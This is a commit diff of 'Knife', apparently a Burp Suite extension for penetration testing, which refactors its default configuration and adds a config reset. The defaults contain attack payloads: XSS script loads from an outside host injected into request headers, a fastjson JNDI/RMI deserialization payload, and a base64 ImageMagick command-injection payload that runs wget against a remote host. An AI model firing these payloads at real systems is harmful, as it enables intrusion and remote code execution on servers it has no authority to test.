Skip to content

Commit da31db9

Browse files
bit4woobit4woo
committed
update
1 parent bd6343b commit da31db9

4 files changed

Lines changed: 71 additions & 40 deletions

File tree

src/burp/BurpExtender.java

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -60,7 +60,7 @@ public class BurpExtender extends GUI implements IBurpExtender, IContextMenuFact
6060
public static PrintWriter stdout;
6161
public static PrintWriter stderr;
6262
public IContextMenuInvocation invocation;
63-
63+
public static IBurpCollaboratorClientContext DNSlogClient;
6464

6565
public static String ExtensionName = "Knife";
6666
public static String Version = bsh.This.class.getPackage().getImplementationVersion();
@@ -76,6 +76,8 @@ public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
7676
flushStd();
7777
BurpExtender.stdout.println(getFullExtensionName());
7878
BurpExtender.stdout.println(github);
79+
80+
DNSlogClient = callbacks.createBurpCollaboratorClientContext();
7981

8082
configTable = new ConfigTable(new ConfigTableModel());
8183
configPanel.setViewportView(configTable);

src/config/ConfigEntry.java

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -336,7 +336,7 @@ public String getFinalValue(IHttpRequestResponse[] messageInfos) {
336336
}
337337
}
338338
for (ConfigEntry config : varConfigs) {
339-
if (valueStr.toLowerCase().contains("{" + config.getKey() + "}")) {
339+
if (valueStr.toLowerCase().contains("{" + config.getKey().toLowerCase() + "}")) {
340340
valueStr = findAndReplace(valueStr, "{" + config.getKey() + "}", config.getValue());
341341
}
342342
}

src/config/ConfigTableMenu.java

Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -2,6 +2,7 @@
22

33
import java.awt.event.ActionEvent;
44
import java.io.PrintWriter;
5+
import java.util.List;
56

67
import javax.swing.AbstractAction;
78
import javax.swing.JMenuItem;
@@ -52,10 +53,27 @@ public void actionPerformed(ActionEvent actionEvent) {
5253
}
5354
}
5455
});
56+
57+
58+
JMenuItem resetItem = new JMenuItem(new AbstractAction("Reset Config") {
59+
@Override
60+
public void actionPerformed(ActionEvent actionEvent) {
61+
for (int row:modelRows) {
62+
ConfigEntry config = configTable.getConfigTableModel().getConfigEntries().get(row);
63+
List<ConfigEntry> defaults = ConfigTableModel.initDefaultConfigs();
64+
for (ConfigEntry item:defaults) {
65+
if (item.getKey().equals(config.getKey())) {
66+
config.setValue(item.getValue());
67+
}
68+
}
69+
}
70+
}
71+
});
5572

5673
add(itemNumber);
5774
add(enableItem);
5875
add(disableItem);
76+
add(resetItem);
5977
}
6078

6179

src/config/ConfigTableModel.java

Lines changed: 49 additions & 38 deletions
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,6 @@
11
package config;
22

3+
import java.awt.Container;
34
import java.io.File;
45
import java.io.PrintWriter;
56
import java.util.ArrayList;
@@ -39,60 +40,70 @@ public class ConfigTableModel extends AbstractTableModel{
3940
+ "--max-rtt-timeout 1000ms --max-retries 0 --max-scan-delay 0 --min-rate 3000 {Host}";
4041

4142
private static final String Robot_Input_Comment = "this config effects how sqlmap and nmap runs";
42-
43-
public ConfigTableModel(){
44-
45-
configEntries.add(new ConfigEntry("Put_MenuItems_In_One_Menu", "",ConfigEntry.Config_Basic_Variable,false,false));
46-
configEntries.add(new ConfigEntry("DNSlogServer", "bit.0y0.link",ConfigEntry.Config_Basic_Variable,true,false));
43+
44+
public static String genDnslogPayload() {
45+
String fullPayload = BurpExtender.DNSlogClient.generatePayload(false)+"."+BurpExtender.DNSlogClient.getCollaboratorServerLocation();
46+
return fullPayload;
47+
}
48+
49+
public static List<ConfigEntry> initDefaultConfigs() {
50+
List<ConfigEntry> defaultConfigEntries = new ArrayList<>();
51+
defaultConfigEntries.add(new ConfigEntry("Put_MenuItems_In_One_Menu", "",ConfigEntry.Config_Basic_Variable,false,false));
52+
defaultConfigEntries.add(new ConfigEntry("DNSlogServer", genDnslogPayload(),ConfigEntry.Config_Basic_Variable,true,false));
4753
if (SystemUtils.isMac()) {
48-
configEntries.add(new ConfigEntry("browserPath", Firefox_Mac,ConfigEntry.Config_Basic_Variable,true,false));
54+
defaultConfigEntries.add(new ConfigEntry("browserPath", Firefox_Mac,ConfigEntry.Config_Basic_Variable,true,false));
4955
}else {
5056
if (new File(Firefox_Windows_C).exists()){
51-
configEntries.add(new ConfigEntry("browserPath", Firefox_Windows_C,ConfigEntry.Config_Basic_Variable,true,false));
57+
defaultConfigEntries.add(new ConfigEntry("browserPath", Firefox_Windows_C,ConfigEntry.Config_Basic_Variable,true,false));
5258
}else {
53-
configEntries.add(new ConfigEntry("browserPath", Firefox_Windows_D,ConfigEntry.Config_Basic_Variable,true,false));
59+
defaultConfigEntries.add(new ConfigEntry("browserPath", Firefox_Windows_D,ConfigEntry.Config_Basic_Variable,true,false));
5460
}
5561
}
56-
configEntries.add(new ConfigEntry("tokenHeaders", "token,Authorization,Auth,jwt",ConfigEntry.Config_Basic_Variable,true,false));
57-
//configEntries.add(new ConfigEntry("DismissedTargets", "{\"*.firefox.com\":\"Drop\",\"*.mozilla.com\":\"Drop\"}",ConfigEntry.Config_Basic_Variable,true,false));
58-
//configEntries.add(new ConfigEntry("DismissedAutoForward", "*.firefox.com,*.mozilla.com",ConfigEntry.Config_Basic_Variable,true,false));
59-
//configEntries.add(new ConfigEntry("DismissedHost", "*.firefox.com,*.mozilla.com",ConfigEntry.Config_Basic_Variable,true,false));
60-
//configEntries.add(new ConfigEntry("DismissedURL", "",ConfigEntry.Config_Basic_Variable,true,false));
61-
//configEntries.add(new ConfigEntry("DismissAction", "enable = ACTION_DROP; disable = ACTION_DONT_INTERCEPT",ConfigEntry.Config_Basic_Variable,true,false,"enable this config to use ACTION_DROP,disable to use ACTION_DONT_INTERCEPT"));
62-
configEntries.add(new ConfigEntry("XSS-Payload", "'\\\"><sCRiPt/src=//bmw.xss.ht>",ConfigEntry.Config_Basic_Variable,true,false));
63-
64-
configEntries.add(new ConfigEntry("SQLMap-Command",SQLMap_Command,ConfigEntry.Run_External_Cmd,true,true));
65-
configEntries.add(new ConfigEntry("Nmap-Command",Nmap_Command,ConfigEntry.Run_External_Cmd,true,false));
66-
configEntries.add(new ConfigEntry("RunTerminalWithRobotInput","",ConfigEntry.Config_Basic_Variable,false,false,Robot_Input_Comment));
67-
configEntries.add(new ConfigEntry("RunTerminalWithKonsole","",ConfigEntry.Config_Basic_Variable,false,false,"判断是否为konsole终端"));
62+
defaultConfigEntries.add(new ConfigEntry("tokenHeaders", "token,Authorization,Auth,jwt",ConfigEntry.Config_Basic_Variable,true,false));
63+
//defaultConfigEntries.add(new ConfigEntry("DismissedTargets", "{\"*.firefox.com\":\"Drop\",\"*.mozilla.com\":\"Drop\"}",ConfigEntry.Config_Basic_Variable,true,false));
64+
//defaultConfigEntries.add(new ConfigEntry("DismissedAutoForward", "*.firefox.com,*.mozilla.com",ConfigEntry.Config_Basic_Variable,true,false));
65+
//defaultConfigEntries.add(new ConfigEntry("DismissedHost", "*.firefox.com,*.mozilla.com",ConfigEntry.Config_Basic_Variable,true,false));
66+
//defaultConfigEntries.add(new ConfigEntry("DismissedURL", "",ConfigEntry.Config_Basic_Variable,true,false));
67+
//defaultConfigEntries.add(new ConfigEntry("DismissAction", "enable = ACTION_DROP; disable = ACTION_DONT_INTERCEPT",ConfigEntry.Config_Basic_Variable,true,false,"enable this config to use ACTION_DROP,disable to use ACTION_DONT_INTERCEPT"));
68+
defaultConfigEntries.add(new ConfigEntry("XSS-Payload", "'\\\"><sCRiPt/src=//bmw.xss.ht>",ConfigEntry.Config_Basic_Variable,true,false));
69+
70+
defaultConfigEntries.add(new ConfigEntry("SQLMap-Command",SQLMap_Command,ConfigEntry.Run_External_Cmd,true,true));
71+
defaultConfigEntries.add(new ConfigEntry("Nmap-Command",Nmap_Command,ConfigEntry.Run_External_Cmd,true,false));
72+
defaultConfigEntries.add(new ConfigEntry("RunTerminalWithRobotInput","",ConfigEntry.Config_Basic_Variable,false,false,Robot_Input_Comment));
73+
defaultConfigEntries.add(new ConfigEntry("RunTerminalWithKonsole","",ConfigEntry.Config_Basic_Variable,false,false,"判断是否为konsole终端"));
6874
//Mac中,通过脚本执行的也会有命令历史记录,使用这种方式最好
6975

70-
configEntries.add(new ConfigEntry("Chunked-Length", "10",ConfigEntry.Config_Chunked_Variable,true,false));
71-
configEntries.add(new ConfigEntry("Chunked-AutoEnable", "",ConfigEntry.Config_Chunked_Variable,false,false));
72-
configEntries.add(new ConfigEntry("Chunked-UseComment", "",ConfigEntry.Config_Chunked_Variable,true,false));
76+
defaultConfigEntries.add(new ConfigEntry("Chunked-Length", "10",ConfigEntry.Config_Chunked_Variable,true,false));
77+
defaultConfigEntries.add(new ConfigEntry("Chunked-AutoEnable", "",ConfigEntry.Config_Chunked_Variable,false,false));
78+
defaultConfigEntries.add(new ConfigEntry("Chunked-UseComment", "",ConfigEntry.Config_Chunked_Variable,true,false));
7379

74-
//configEntries.add(new ConfigEntry("Proxy-ServerList", "127.0.0.1:8888;127.0.0.1:9999;",ConfigEntry.Config_Proxy_Variable,false,false));
75-
//configEntries.add(new ConfigEntry("Proxy-UseRandomMode", "",ConfigEntry.Config_Proxy_Variable,true,false));
80+
//defaultConfigEntries.add(new ConfigEntry("Proxy-ServerList", "127.0.0.1:8888;127.0.0.1:9999;",ConfigEntry.Config_Proxy_Variable,false,false));
81+
//defaultConfigEntries.add(new ConfigEntry("Proxy-UseRandomMode", "",ConfigEntry.Config_Proxy_Variable,true,false));
7682
//以上都是固定基础变量,不需要修改名称和类型
7783

78-
configEntries.add(new ConfigEntry("Last-Modified", "",ConfigEntry.Action_Remove_From_Headers,true,true));
79-
configEntries.add(new ConfigEntry("If-Modified-Since", "",ConfigEntry.Action_Remove_From_Headers,true,true));
80-
configEntries.add(new ConfigEntry("If-None-Match", "",ConfigEntry.Action_Remove_From_Headers,true,true));
81-
configEntries.add(new ConfigEntry("OPTIONS", "",ConfigEntry.Action_Forward_And_Hide_Options,true,true));
84+
defaultConfigEntries.add(new ConfigEntry("Last-Modified", "",ConfigEntry.Action_Remove_From_Headers,true,true));
85+
defaultConfigEntries.add(new ConfigEntry("If-Modified-Since", "",ConfigEntry.Action_Remove_From_Headers,true,true));
86+
defaultConfigEntries.add(new ConfigEntry("If-None-Match", "",ConfigEntry.Action_Remove_From_Headers,true,true));
87+
defaultConfigEntries.add(new ConfigEntry("OPTIONS", "",ConfigEntry.Action_Forward_And_Hide_Options,true,true));
8288

83-
configEntries.add(new ConfigEntry("X-Forwarded-For", "'\\\"><sCRiPt/src=//bmw.xss.ht>",ConfigEntry.Action_Add_Or_Replace_Header,true,true));
89+
defaultConfigEntries.add(new ConfigEntry("X-Forwarded-For", "'\\\"><sCRiPt/src=//bmw.xss.ht>",ConfigEntry.Action_Add_Or_Replace_Header,true,true));
8490
//避免IP:port的切分操作,把Payload破坏,所以使用不带分号的简洁Payload
85-
configEntries.add(new ConfigEntry("User-Agent", "'\\\"/><script src=https://bmw.xss.ht></script><img/src={dnslogserver}/{host}>",ConfigEntry.Action_Append_To_header_value,true,true));
86-
//configEntries.add(new ConfigEntry("knife", "'\\\"/><script src=https://bmw.xss.ht></script><img/src=%dnslogserver/%host>",ConfigEntry.Action_Add_Or_Replace_Header,true));
91+
defaultConfigEntries.add(new ConfigEntry("User-Agent", "'\\\"/><script src=https://bmw.xss.ht></script><img/src={dnslogserver}/{host}>",ConfigEntry.Action_Append_To_header_value,true,true));
92+
//defaultConfigEntries.add(new ConfigEntry("knife", "'\\\"/><script src=https://bmw.xss.ht></script><img/src=%dnslogserver/%host>",ConfigEntry.Action_Add_Or_Replace_Header,true));
8793

88-
configEntries.add(new ConfigEntry("fastjson", "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://{host}.fastjson.{dnslogserver}/evil\",\"autoCommit\":true}",ConfigEntry.Config_Custom_Payload,true));
94+
defaultConfigEntries.add(new ConfigEntry("fastjson", "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://{host}.fastjson.{dnslogserver}/evil\",\"autoCommit\":true}",ConfigEntry.Config_Custom_Payload,true));
8995

90-
configEntries.add(new ConfigEntry("Imagemagick","cHVzaCBncmFwaGljLWNvbnRleHQNCnZpZXdib3ggMCAwIDY0MCA0ODANCmltYWdlIG92ZXIgMCwwIDAsMCAnaHR0cHM6Ly9pbWFnZW1hZ2ljLmJpdC4weTAubGluay94LnBocD94PWB3Z2V0IC1PLSAlcyA+IC9kZXYvbnVsbGAnDQpwb3AgZ3JhcGhpYy1jb250ZXh0",ConfigEntry.Config_Custom_Payload_Base64,true));
96+
defaultConfigEntries.add(new ConfigEntry("Imagemagick","cHVzaCBncmFwaGljLWNvbnRleHQNCnZpZXdib3ggMCAwIDY0MCA0ODANCmltYWdlIG92ZXIgMCwwIDAsMCAnaHR0cHM6Ly9pbWFnZW1hZ2ljLmJpdC4weTAubGluay94LnBocD94PWB3Z2V0IC1PLSAlcyA+IC9kZXYvbnVsbGAnDQpwb3AgZ3JhcGhpYy1jb250ZXh0",ConfigEntry.Config_Custom_Payload_Base64,true));
9197

92-
configEntries.add(new ConfigEntry("*.firefox.com", "",ConfigEntry.Action_Drop_Request_If_Host_Matches,true));
93-
configEntries.add(new ConfigEntry("*.mozilla.com", "",ConfigEntry.Action_Drop_Request_If_Host_Matches,true));
94-
configEntries.add(new ConfigEntry("*.mozilla.org", "",ConfigEntry.Action_Drop_Request_If_Host_Matches,true));
95-
configEntries.add(new ConfigEntry("*.mozilla.net", "",ConfigEntry.Action_Drop_Request_If_Host_Matches,true));
98+
defaultConfigEntries.add(new ConfigEntry("*.firefox.com", "",ConfigEntry.Action_Drop_Request_If_Host_Matches,true));
99+
defaultConfigEntries.add(new ConfigEntry("*.mozilla.com", "",ConfigEntry.Action_Drop_Request_If_Host_Matches,true));
100+
defaultConfigEntries.add(new ConfigEntry("*.mozilla.org", "",ConfigEntry.Action_Drop_Request_If_Host_Matches,true));
101+
defaultConfigEntries.add(new ConfigEntry("*.mozilla.net", "",ConfigEntry.Action_Drop_Request_If_Host_Matches,true));
102+
return defaultConfigEntries;
103+
}
104+
105+
public ConfigTableModel(){
106+
configEntries = initDefaultConfigs();
96107
}
97108

98109
public void addListener() {

0 commit comments

Comments
 (0)